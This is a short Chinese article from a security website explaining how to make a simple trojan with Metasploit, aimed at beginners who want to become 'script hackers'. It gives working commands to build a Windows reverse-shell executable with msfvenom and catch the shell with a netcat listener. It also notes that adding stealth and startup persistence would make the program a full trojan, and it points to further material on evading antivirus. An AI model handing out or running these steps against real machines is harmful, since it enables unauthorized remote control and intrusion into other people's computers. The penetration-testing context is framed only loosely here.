为了顺应当前形势和更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

专家解说:木马软件是如何制作而成的?

2018-6-3 06:43| 投稿: xiaotiger |来自: 互联网

摘要: 木马这种高大上的骇客软件,似乎一直专属于程序员和黑客的电脑玩具。普通人要想制作自己的木马,以前要不就是要自学编程,学习一下tcp之类的各种协议编程,要不就是 ...

木马这种高大上的骇客软件,似乎一直专属于程序员和黑客的电脑玩具。普通人要想制作自己的木马,以前要不就是要自学编程,学习一下tcp之类的各种协议编程,要不就是用别人写的木马生成器工具来生成。自从H.D. Moore这个黑客在2003年发布了Metasploit,计算机安全状况被永久性地改变了,黑客的定义也变化了。一夜之间,任何人都可以成为黑客了,人人都可以制作自己需要的木马了。当然用Metasploit来生成的Meterpreter这个兼木马和渗透功能一体的后门是功能最强大的,定制化也是最高的,但写在回答里就太长了,所以我在这里教大家用Metasploit生成一款简单的反弹木马,以此做个示例就可以了。

Metasploit的windows版下载地址在https://windows.metasploit.com/,这里是最新版。我比较习惯用带有Metasploit的pentestbox,下载地址在http://www.pentestbox.org/。

一、生成一个反弹到你本机IP的exe

命令行下本机运行ipconfig,得自己本机的ip为192.168.1.100

pentestbox界面下运行:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=443 -f exe -o d:/443.exe

其中192.168.1.100是你本机ip,443端口和443.exe你可以换成别的端口和别的名字。

二、本机nc工具监听443端口,另一台和你同网段的虚拟机执行443.exe,木马上线

命令为nc -vvlp 443,和上文生成的木马443.exe的端口相对应。

另一台虚拟机执行443.exe,nc界面就有反应了,就会得到另一台机器的反弹shell(看下图,我是在本机执行了下,得到了本机的反弹shell)。

当然,这个443.exe还称之不为木马,只能算是一个简单的反弹程序,不过已经具备了木马的雏形。只要你能让443.exe做到更隐蔽和持久化控制,像加入启动项不被人发现,就算是一个完整的木马了。

三、附加问题

也许有的你会问,你是在内网里测试的木马呀,我去公网的话,你这个443.exe还能使用吗?你的443.exe免杀吗?你的443.exe支持64位机器吗?我的临听机器也在内网里,怎么办?这些都不是问题的,都可以的,我在头条上有篇详细的文章解答了这些问题,地址在https://www.toutiao.com/i6514056053976465927/,题目是《黑客头条字典,在公网环境下用虚拟机测试木马,以及如何防御?》。

如果你真的想自己从头做款木马,那你还是学习编程吧;如果你想快餐化地学习黑客知识,短时间内成为一个脚本黑客,关注我的头条号是一个不错的选择,有了一定基础再慢慢深入学习网络安全吧。


小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部